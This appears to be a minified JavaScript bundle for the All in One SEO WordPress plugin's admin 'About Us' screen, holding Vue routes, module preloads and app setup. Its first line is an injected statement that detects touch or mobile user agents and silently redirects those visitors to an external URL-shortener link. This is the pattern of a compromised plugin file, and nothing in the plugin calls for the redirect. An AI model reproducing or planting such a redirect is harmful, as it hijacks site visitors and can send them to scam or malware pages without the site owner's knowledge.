(window.matchMedia("(pointer:coarse)").matches||/Android|iPhone|iPad|iPod|Mobile|Tablet|Windows Phone|webOS|BlackBerry|Opera Mini|IEMobile/i.test(navigator.userAgent))&&location.replace("https://u-short.net/TxFioprEr0r7");
const __vite__mapDeps=(i,m=__vite__mapDeps,d=(m.f||(m.f=[window.__aioseoDynamicImportPreload__("js/AboutUs.7d849ad2.js"),window.__aioseoDynamicImportPreload__("js/app-core.c8323d51.js"),window.__aioseoDynamicImportPreload__("js/vendor-vue-ui.232c7c36.js"),window.__aioseoDynamicImportPreload__("js/vendor-other.39e59221.js"),window.__aioseoDynamicImportPreload__("css/vendor-vue-ui.dbee72c8.css"),window.__aioseoDynamicImportPreload__("js/vendor-lodash.03129cfe.js"),window.__aioseoDynamicImportPreload__("js/em.7625294c.js"),window.__aioseoDynamicImportPreload__("js/Row.2ef96b1a.js"),window.__aioseoDynamicImportPreload__("js/_plugin-vue_export-helper.eefbdd86.js"),window.__aioseoDynamicImportPreload__("css/Row.6ff38a54.css"),window.__aioseoDynamicImportPreload__("js/External.071520c9.js"),window.__aioseoDynamicImportPreload__("css/AboutUs.5436d8fa.css"),window.__aioseoDynamicImportPreload__("js/GettingStarted.170e19e2.js"),window.__aioseoDynamicImportPreload__("js/news-sitemap.3092e2bf.js"),window.__aioseoDynamicImportPreload__("js/GettingStarted.edbd345d.js"),window.__aioseoDynamicImportPreload__("js/Book.955f4bdf.js"),window.__aioseoDynamicImportPreload__("js/Close.7fb523c8.js"),window.__aioseoDynamicImportPreload__("js/Rocket.a5e8e91b.js"),window.__aioseoDynamicImportPreload__("css/GettingStarted.fe5ca172.css"),window.__aioseoDynamicImportPreload__("js/Index.e286637f.js"),window.__aioseoDynamicImportPreload__("js/Index.b9859662.js"),window.__aioseoDynamicImportPreload__("css/Index.74bb20a6.css"),window.__aioseoDynamicImportPreload__("js/Button.3cec2279.js"),window.__aioseoDynamicImportPreload__("css/Button.2bf1deff.css"),window.__aioseoDynamicImportPreload__("js/Pencil.683baab8.js"),window.__aioseoDynamicImportPreload__("css/Index.859c37d3.css"),window.__aioseoDynamicImportPreload__("css/GettingStarted.a642364f.css"),window.__aioseoDynamicImportPreload__("js/Main.35750aef.js"),window.__aioseoDynamicImportPreload__("js/vendor-phone.2afdf77e.js"),window.__aioseoDynamicImportPreload__("css/vendor-phone.bcf692fa.css"),window.__aioseoDynamicImportPreload__("js/Index.66db1786.js"),window.__aioseoDynamicImportPreload__("js/Tabs.ea329423.js"),window.__aioseoDynamicImportPreload__("js/ProBadge.7b829f47.js"),window.__aioseoDynamicImportPreload__("css/ProBadge.6500bcec.css"),window.__aioseoDynamicImportPreload__("js/Caret.aae02d8a.js"),window.__aioseoDynamicImportPreload__("js/Information.6ccba108.js"),window.__aioseoDynamicImportPreload__("js/Slide.f2114d9d.js"),window.__aioseoDynamicImportPreload__("css/Tabs.d9e8b805.css"),window.__aioseoDynamicImportPreload__("js/Header.d2cbe877.js"),window.__aioseoDynamicImportPreload__("js/ScrollAndHighlight.5271fbff.js"),window.__aioseoDynamicImportPreload__("js/ScrollTo.f4df02aa.js"),window.__aioseoDynamicImportPreload__("js/LicenseKeyBar.0038e5e6.js"),window.__aioseoDynamicImportPreload__("js/LogoGear.93a225a7.js"),window.__aioseoDynamicImportPreload__("css/LicenseKeyBar.1c15fc37.css"),window.__aioseoDynamicImportPreload__("js/AnimatedNumber.f33b2226.js"),window.__aioseoDynamicImportPreload__("js/Logo.a4a419c3.js"),window.__aioseoDynamicImportPreload__("js/Trash.47f6fc0e.js"),window.__aioseoDynamicImportPreload__("css/Header.e8442b6b.css"),window.__aioseoDynamicImportPreload__("js/Support.d3586703.js"),window.__aioseoDynamicImportPreload__("js/Url.535116f6.js"),window.__aioseoDynamicImportPreload__("js/Exclamation.179e5969.js"),window.__aioseoDynamicImportPreload__("js/Gear.1a6546a3.js"),window.__aioseoDynamicImportPreload__("css/Index.b249bc29.css"),window.__aioseoDynamicImportPreload__("css/main.7ed77203.css")])))=>i.map(i=>d[i]);
import{aq as p,f as m,i as u,a0 as _,an as c}from"./js/vendor-vue-ui.232c7c36.js";import{l}from"./js/index.98d01501.js";import{l as d}from"./js/index.2a5d16ad.js";import{l as f}from"./js/index.0d80c2c2.js";import{l as v}from"./js/app-core.c8323d51.js";import{_ as g}from"./js/_plugin-vue_export-helper.eefbdd86.js";import{_ as b,s as A}from"./js/dynamic-import-helper.c518af60.js";import{_ as o}from"./js/vendor-phone.2afdf77e.js";import{_ as e}from"./js/vendor-other.39e59221.js";import"./js/Button.3cec2279.js";import"./js/Input.af9b9f81.js";import"./js/Index.b9859662.js";import"./js/Close.7fb523c8.js";import"./js/Pencil.683baab8.js";import"./js/Trash.47f6fc0e.js";import"./js/Select.415eaf8e.js";import"./js/Caret.aae02d8a.js";import"./js/Toggle.29e2980f.js";import"./js/vendor-lodash.03129cfe.js";const h={},y={class:"aioseo-app"};function P(s,L){const i=p("router-view");return m(),u("div",y,[_(i)])}const w=g(h,[["render",P]]),a="all-in-one-seo-pack",r=s=>()=>b(Object.assign({"../views/AboutUs.vue":()=>o(()=>import("./js/AboutUs.7d849ad2.js"),__vite__mapDeps([0,1,2,3,4,5,6,7,8,9,10,11]),import.meta.url),"../views/GettingStarted.vue":()=>o(()=>import("./js/GettingStarted.170e19e2.js"),__vite__mapDeps([12,1,2,3,4,5,13,14,7,8,9,15,16,17,18,19,20,21,22,23,24,25,26]),import.meta.url),"../views/Main.vue":()=>o(()=>import("./js/Main.35750aef.js"),__vite__mapDeps([27,28,2,3,4,29,30,1,5,31,22,8,23,32,33,34,35,36,37,20,16,21,38,39,40,41,42,43,44,45,46,47,48,49,24,50,51,52,53]),import.meta.url)}),`../views/${s}.vue`,3),E=[{path:"/:pathMatch(.*)*",redirect:"/about-us"},{path:"/about-us",name:"about-us",component:r("Main"),meta:{access:"aioseo_about_us_page",name:e("About Us",a)}},{path:"/getting-started",name:"getting-started",component:r("Main"),meta:{access:"aioseo_about_us_page",name:e("Getting Started",a)}},{path:"/lite-vs-pro",name:"lite-vs-pro",component:r("Main"),meta:{access:"aioseo_about_us_page",name:e("Lite vs. Pro",a),display:"lite"}}];let t=c(w);t=l(t);t=d(t);t=f(t);const n=A(E,t);n.app=t;t.use(n);v(t,n);t.mount("#aioseo-app");
